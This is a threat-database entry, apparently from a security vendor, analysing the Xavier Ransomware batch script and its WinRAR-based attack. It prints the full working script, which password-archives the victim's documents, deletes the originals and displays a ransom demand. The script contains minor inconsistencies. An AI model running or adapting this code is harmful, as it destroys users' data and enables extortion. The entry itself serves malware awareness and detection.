Threat Database Ransomware Xavier Ransomware

Xavier Ransomware

By GoldSparrow in Ransomware

The Xavier Ransomware is a non-standard Trojan that is placed under the crypto-threat class of cyber-threats. The Xavier Ransomware was added to AV databases on January 5th, 2019 and it may be deployed to users via corrupted advertisements, spam emails, macro-enabled documents, and fake updates to the font used in your Web browser. What is interesting about the Xavier Ransomware is that it is loaded not as a program but as a BATCH script. The technique has been utilized by a very small number of threat actors in the past due to its limitations and lacking code obfuscation possibilities. However, the Xavier Ransomware resembles the RarVault Ransomware with its ability to initiate legitimate software and use it for nefarious purposes.

As mentioned above, the Xavier Ransomware is packed as a BACH script that researchers collected as 'Encoder.bat' from a security platform. The 'Encoder.bat' script revealed that its authors rely on the WinRAR software by win.rar GmbH. to be installed on the compromised systems for the attack to succeed. There are many other cyber-threats that leverage legitimate and clean applications to facilitate the attacks on the users, but the Xavier Ransomware is simple in how it works surprisingly. The Xavier Ransomware is executed in ten lines of code that create a password protected archive with the user's data and a short ransom message on the user's screen. The entire code for the Xavier Ransomware can be found below:

@echo off
set filename="LOCK.rar"
set commentsfile=info.txt
set pass="xavier"
set comment="Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd"
msg * %comments%
"%PROGRAMFILES%\WinRAR\Rar.exe" a -r -y -ri15 -df -m0 -inul -p%pass% %filename%
echo %comments% >> %commentsfile%
"%PROGRAMFILES%\WinRAR\Rar.exe" c %filename% -z%commentsfile%
del %0

Please, note that you should not save it and run it on your PC if you have installed the WinRAR program and didn't want to delete files on your computer. The Xavier Ransomware is designed to create a vault named 'LOCK.rar' on the system drive and place all documents found inside the user's home folder. The Trojan is named after the password found in samples — 'xavier,' which is used for 'LOCK.rar.' The Xavier Ransomware writes a file called 'Info.txt' to the Temp folder and loads it on the screen once the user's content is placed in the archive vault. 'Info.txt' offers the following — 'Files Blocked! CONTACT: SENT 0.3 XMR TO 0x0050d76893de9E045fbaBCDb6A58dC714BDd' and directs the users to pay 0.3 XMR (≈15USD/13 EUR) to a wallet address.

The Xavier Ransomware has not been distributed widely, and it is not perceived as a significant threat to the users, but it may evolve. It is best to make backups regularly and avoid questionable advertisements on the sites you visit. Detection names for the Xavier Ransomware include:

Trojan ( 00491e9a1 )


Most Viewed